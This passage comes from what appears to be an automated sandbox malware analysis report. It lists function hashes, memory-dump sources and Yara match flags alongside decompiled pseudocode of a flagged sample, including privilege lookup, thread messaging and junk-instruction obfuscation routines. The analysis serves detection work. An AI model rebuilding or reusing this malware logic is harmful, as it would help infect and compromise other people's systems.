                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                      • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                      • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                      • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true
                                                      • Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                      • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                      • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                      • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true
                                                      • Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                      • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                      • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                      • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true
                                                      • Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                      • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                      • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                      • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                      • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                      • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                      • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                      • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                      • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                      • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                      • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                      • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                      • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                      • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                      • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                      • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 93%
                                                      			E004088C0(intOrPtr _a4) {
                                                      				intOrPtr _v8;
                                                      				char _v24;
                                                      				char _v284;
                                                      				char _v804;
                                                      				char _v840;
                                                      				void* _t24;
                                                      				void* _t31;
                                                      				void* _t33;
                                                      				void* _t34;
                                                      				void* _t39;
                                                      				void* _t50;
                                                      				intOrPtr _t52;
                                                      				void* _t53;
                                                      				void* _t54;
                                                      				void* _t55;
                                                      				void* _t56;
                                                      
                                                      				_t52 = _a4;
                                                      				_t39 = 0; // executed
                                                      				_t24 = E00406E20(_t52,  &_v24); // executed
                                                      				_t54 = _t53 + 8;
                                                      				if(_t24 != 0) {
                                                      					E00407030( &_v24,  &_v840);
                                                      					_t55 = _t54 + 8;
                                                      					do {
                                                      						E0041A0C0( &_v284, 0x104);
                                                      						E0041A730( &_v284,  &_v804);
                                                      						_t56 = _t55 + 0x10;
                                                      						_t50 = 0x4f;
                                                      						while(1) {
                                                      							_t31 = E00413DE0(E00413D80(_t52, _t50),  &_v284);
                                                      							_t56 = _t56 + 0x10;
                                                      							if(_t31 != 0) {
                                                      								break;
                                                      							}
                                                      							_t50 = _t50 + 1;
                                                      							if(_t50 <= 0x62) {
                                                      								continue;
                                                      							} else {
                                                      							}
                                                      							goto L8;
                                                      						}
                                                      						_t9 = _t52 + 0x14; // 0xffffe1b5
                                                      						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                                      						_t39 = 1;
                                                      						L8:
                                                      						_t33 = E00407060( &_v24,  &_v840);
                                                      						_t55 = _t56 + 8;
                                                      					} while (_t33 != 0 && _t39 == 0);
                                                      					_t34 = E004070E0(_t52,  &_v24); // executed
                                                      					if(_t39 == 0) {
                                                      						asm("rdtsc");
                                                      						asm("rdtsc");
                                                      						_v8 = _t34 - 0 + _t34;
                                                      						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                                      					}
                                                      					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                                      					_t20 = _t52 + 0x31; // 0x5608758b
                                                      					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                                      					return 1;
                                                      				} else {
                                                      					return _t24;
                                                      				}
                                                      			}

                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 299515b6a4c4b7fe34a0254a828e2e35bbff23895406936d62d23753fc4f2dc5
                                                      • Instruction ID: 2d85129770ae1569db338c81f9331519a7dd6e0895954f6df8c699ab0d1d1ce1
                                                      • Opcode Fuzzy Hash: 299515b6a4c4b7fe34a0254a828e2e35bbff23895406936d62d23753fc4f2dc5
                                                      • Instruction Fuzzy Hash: C5212BB2C442085BCB11E6609D42BFF736C9B14304F04017FE989A3181FA38AB498BA7
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00418880(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                                      				void* _t10;
                                                      				void* _t15;
                                                      
                                                      				E004191B0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                      				_t6 =  &_a8; // 0x413526
                                                      				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                                      				return _t10;
                                                      			}

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID: &5A
                                                      • API String ID: 1279760036-1617645808
                                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                      • Instruction ID: 4ef14f879dafae0d6951d5bd0a6bbd37283b7ec5dd2ccf2ca50cdce3f5cd3bdb
                                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                      • Instruction Fuzzy Hash: 6CE012B1200208ABDB14EF99CC45EA777ADAF88654F158559FA095B242CA30F910CAF4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 004188ED
                                                      • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418928
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitFreeHeapProcess
                                                      • String ID:
                                                      • API String ID: 1180424539-0
                                                      • Opcode ID: 712053724ce6fde3dda3dc2c9ff3630cdedbb5a685f270781d41f3608182f818
                                                      • Instruction ID: e2a99679b142890d3171876c2147a3a0cbfe3255010accf2b4f8d621d631af7b
                                                      • Opcode Fuzzy Hash: 712053724ce6fde3dda3dc2c9ff3630cdedbb5a685f270781d41f3608182f818
                                                      • Instruction Fuzzy Hash: 3BF0F0B0200200BFC710DF69CC88EE73BA9EF88320F04864AF9089B312C630E900CAF4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
                                                      				char _v67;
                                                      				char _v68;
                                                      				void* _t12;
                                                      				intOrPtr* _t13;
                                                      				int _t14;
                                                      				long _t21;
                                                      				intOrPtr* _t25;
                                                      				void* _t26;
                                                      				void* _t30;
                                                      
                                                      				_t30 = __eflags;
                                                      				_v68 = 0;
                                                      				E0041A110( &_v67, 0, 0x3f);
                                                      				E0041ACF0( &_v68, 3);
                                                      				_t12 = E00409B30(_t30, _a4 + 0x1c,  &_v68); // executed
                                                      				_t13 = E00413E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                      				_t25 = _t13;
                                                      				if(_t25 != 0) {
                                                      					_t21 = _a8;
                                                      					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                      					_t32 = _t14;
                                                      					if(_t14 == 0) {
                                                      						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                      					}
                                                      					return _t14;
                                                      				}
                                                      				return _t13;
                                                      			}

                                                      APIs
                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: 14624e8db26b89bccf1705d7108d041dc2e52ca21b332cab295bc8e658a3c696
                                                      • Instruction ID: 7737b7532069fc333edaf9b0832c3edc759e3be1fb1c5433828103526b109584
                                                      • Opcode Fuzzy Hash: 14624e8db26b89bccf1705d7108d041dc2e52ca21b332cab295bc8e658a3c696
                                                      • Instruction Fuzzy Hash: 36018431A8022876E721A6959C03FFE776C5B00B55F15416EFF04BA1C2E6A87A0546EA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E00418A13(void* __eax, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                      				signed int _t8;
                                                      				int _t13;
                                                      				intOrPtr* _t14;
                                                      				void* _t17;
                                                      				void* _t20;
                                                      
                                                      				_t8 = __eax - 1;
                                                      				if(_t8 > 0) {
                                                      					L4:
                                                      					return  *_t14(_t8, _t17);
                                                      				} else {
                                                      					_t8 = _t8 | 0xccd37f06;
                                                      					if(_t8 != 0) {
                                                      						goto L4;
                                                      					} else {
                                                      						 *0x8b5535d4 = _t8;
                                                      						_t10 = _a4;
                                                      						E004191B0(_t20, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t10 + 0xa18)), 0, 0x46);
                                                      						_t13 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                      						return _t13;
                                                      					}
                                                      				}
                                                      			}

                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A50
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 004188ED
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00418A20(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                      				int _t10;
                                                      				void* _t15;
                                                      
                                                      				E004191B0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                      				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                      				return _t10;
                                                      			}





                                                      0x00418a3a
                                                      0x00418a50
                                                      0x00418a54

                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A50
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418928
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      C-Code - Quality: 15%
                                                      			E0040C37C(signed int* __ecx, void* __edx, signed int* __esi) {
                                                      				void* _t40;
                                                      				signed char _t42;
                                                      				void* _t43;
                                                      				signed int* _t44;
                                                      				signed int* _t45;
                                                      				signed int _t47;
                                                      				signed int _t48;
                                                      				signed int* _t65;
                                                      				void* _t70;
                                                      				void* _t76;
                                                      				signed int* _t82;
                                                      				void* _t86;
                                                      				void* _t90;
                                                      				signed int* _t95;
                                                      				signed int _t97;
                                                      
                                                      				_t82 = __esi;
                                                      				_t70 = __edx;
                                                      				_t65 = __ecx;
                                                      				asm("bswap ebx");
                                                      				asm("adc ebp, esp");
                                                      				_t42 = _t40 - __ecx[0x1cfebcdc];
                                                      				 *0xb83fd878 = _t42;
                                                      				asm("xlatb");
                                                      				 *__esi =  *__esi | _t42;
                                                      				_pop(_t43);
                                                      				asm("adc al, 0x7");
                                                      				_t44 = _t43 -  *((intOrPtr*)(_t86 + 7));
                                                      				_t95 = _t44;
                                                      				asm("lodsd");
                                                      				if(_t95 < 0) {
                                                      					asm("sbb eax, 0x64a59f4c");
                                                      					asm("in eax, 0x8d");
                                                      					return _t44;
                                                      				} else {
                                                      					asm("xlatb");
                                                      					asm("sti");
                                                      					 *0xc05cc95c = _t44;
                                                      					if(_t95 != 0) {
                                                      						L9:
                                                      						 *((intOrPtr*)(_t65 - 0x73)) =  *((intOrPtr*)(_t65 - 0x73)) + _t70;
                                                      						_t45 = _t82;
                                                      						_t82 = _t44;
                                                      						asm("fdivr qword [edi]");
                                                      						 *_t45 = _t45 +  *_t45;
                                                      						_push(_t70);
                                                      						goto L10;
                                                      					} else {
                                                      						_t90 = _t90 +  *((intOrPtr*)(__esi - 0xb));
                                                      						asm("cld");
                                                      						if(_t90 >= 0) {
                                                      							asm("sbb [eax+0xaf4d720], edx");
                                                      							_t97 = _t44[0x5dfc26e] * 0xffffff97;
                                                      						}
                                                      						_t47 = 0x97177f09;
                                                      						asm("int1");
                                                      						asm("stosb");
                                                      						asm("fcomp dword [ecx]");
                                                      						if(_t97 <= 0) {
                                                      							asm("in al, dx");
                                                      							_t44 =  *( *((intOrPtr*)(_t86 + 0xc)) + 8);
                                                      							_push(_t82);
                                                      							_push(0x328a7f64);
                                                      							_t76 = 0;
                                                      							if(_t44 != 8) {
                                                      								if(_t44 != 0xd) {
                                                      									if(_t44 != 9) {
                                                      										if(_t44 != 0x1b) {
                                                      											if(_t44 != 0x12) {
                                                      												if( &(_t44[0xffffffffffffffe4]) > 0x17) {
                                                      													goto L14;
                                                      												} else {
                                                      													return 1;
                                                      												}
                                                      											} else {
                                                      												_t82 =  *(_t86 + 8);
                                                      												E0041A090( &(_t82[0xff7]),  &(_t82[0x131d]), 0xc);
                                                      												_t82[0xfad] = 5;
                                                      												goto L11;
                                                      											}
                                                      										} else {
                                                      											_t82 =  *(_t86 + 8);
                                                      											E0041A090( &(_t82[0xff7]),  &(_t82[0x1317]), 0xc);
                                                      											_t82[0xfad] = 5;
                                                      											goto L11;
                                                      										}
                                                      									} else {
                                                      										_t82 =  *(_t86 + 8);
                                                      										E0041A090( &(_t82[0xff7]),  &(_t82[0x1323]), 0xc);
                                                      										_t82[0xfad] = 5;
                                                      										goto L11;
                                                      									}
                                                      								} else {
                                                      									_t82 =  *(_t86 + 8);
                                                      									_push(0x10);
                                                      									_push( &(_t82[0x1329]));
                                                      									_push( &(_t82[0xff7]));
                                                      									L10:
                                                      									E0041A090();
                                                      									_t82[0xfad] = 7;
                                                      									L11:
                                                      									_t47 = _t82[0xfad];
                                                      									_push(4);
                                                      									goto L12;
                                                      								}
                                                      							} else {
                                                      								_t82 =  *(_t86 + 8);
                                                      								_push(0x10);
                                                      								_t65 =  &(_t82[0x132f]);
                                                      								goto L9;
                                                      							}
                                                      						} else {
                                                      							_push(_t82);
                                                      							asm("rcl edx, cl");
                                                      							asm("lahf");
                                                      							L12:
                                                      							_t48 = _t47 + 0x8d;
                                                      							_push( &(_t82[0xfb5]));
                                                      							_push(_t82 + 0x3fdc + _t48 * 2);
                                                      							_t76 = 1;
                                                      							E0041A090();
                                                      							_t82[0xfad] = _t82[0xfad] + 2;
                                                      							L0040C150(_t82, 2);
                                                      							L14:
                                                      							return _t76;
                                                      						}
                                                      					}
                                                      				}
                                                      			}



















                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true
                                                      • Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 16%
                                                      			E00406ABB(void* __eax) {
                                                      
                                                      				asm("pushfd");
                                                      				asm("adc bl, [ecx-0x725c4498]");
                                                      				return 1;
                                                      			}



                                                      0x00406abb
                                                      0x00406abd
                                                      0x00406ad4

                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true
                                                      • Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp
                                                      C-Code - Quality: 94%
                                                      			E008A8788(signed int __ecx, void* __edx, signed int _a4) {
                                                      				signed int _v8;
                                                      				short* _v12;
                                                      				void* _v16;
                                                      				signed int _v20;
                                                      				char _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				char _v36;
                                                      				signed int _v40;
                                                      				char _v44;
                                                      				signed int _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				signed int _v60;
                                                      				char _v68;
                                                      				void* _t216;
                                                      				intOrPtr _t231;
                                                      				short* _t235;
                                                      				intOrPtr _t257;
                                                      				short* _t261;
                                                      				intOrPtr _t284;
                                                      				intOrPtr _t288;
                                                      				void* _t314;
                                                      				signed int _t318;
                                                      				short* _t319;
                                                      				intOrPtr _t321;
                                                      				void* _t328;
                                                      				void* _t329;
                                                      				char* _t332;
                                                      				signed int _t333;
                                                      				signed int* _t334;
                                                      				void* _t335;
                                                      				void* _t338;
                                                      				void* _t339;
                                                      
                                                      				_t328 = __edx;
                                                      				_t322 = __ecx;
                                                      				_t318 = 0;
                                                      				_t334 = _a4;
                                                      				_v8 = 0;
                                                      				_v28 = 0;
                                                      				_v48 = 0;
                                                      				_v20 = 0;
                                                      				_v40 = 0;
                                                      				_v32 = 0;
                                                      				_v52 = 0;
                                                      				if(_t334 == 0) {
                                                      					_t329 = 0xc000000d;
                                                      					L49:
                                                      					_t334[0x11] = _v56;
                                                      					 *_t334 =  *_t334 | 0x00000800;
                                                      					_t334[0x12] = _v60;
                                                      					_t334[0x13] = _v28;
                                                      					_t334[0x17] = _v20;
                                                      					_t334[0x16] = _v48;
                                                      					_t334[0x18] = _v40;
                                                      					_t334[0x14] = _v32;
                                                      					_t334[0x15] = _v52;
                                                      					return _t329;
                                                      				}
                                                      				_v56 = 0;
                                                      				if(E008A8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                      					_v56 = 1;
                                                      					if(_v8 != 0) {
                                                      						_t207 = E0088E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                      					}
                                                      					_push(1);
                                                      					_v8 = _t318;
                                                      					E008A718A(_t207);
                                                      					_t335 = _t335 + 4;
                                                      				}
                                                      				_v60 = _v60 | 0xffffffff;
                                                      				if(E008A8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                      					_t333 =  *_v8;
                                                      					_v60 = _t333;
                                                      					_t314 = E0088E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                      					_push(_t333);
                                                      					_v8 = _t318;
                                                      					E008A718A(_t314);
                                                      					_t335 = _t335 + 4;
                                                      				}
                                                      				_t216 = E008A8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                      				_t332 = ";";
                                                      				if(_t216 < 0) {
                                                      					L17:
                                                      					if(E008A8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                      						L30:
                                                      						if(E008A8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                      							L46:
                                                      							_t329 = 0;
                                                      							L47:
                                                      							if(_v8 != _t318) {
                                                      								E0088E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                      							}
                                                      							if(_v28 != _t318) {
                                                      								if(_v20 != _t318) {
                                                      									E0088E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                      									_v20 = _t318;
                                                      									_v40 = _t318;
                                                      								}
                                                      							}
                                                      							goto L49;
                                                      						}
                                                      						_t231 = _v24;
                                                      						_t322 = _t231 + 4;
                                                      						_push(_t231);
                                                      						_v52 = _t322;
                                                      						E008A718A(_t231);
                                                      						if(_t322 == _t318) {
                                                      							_v32 = _t318;
                                                      						} else {
                                                      							_v32 = E0088E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                      						}
                                                      						if(_v32 == _t318) {
                                                      							_v52 = _t318;
                                                      							L58:
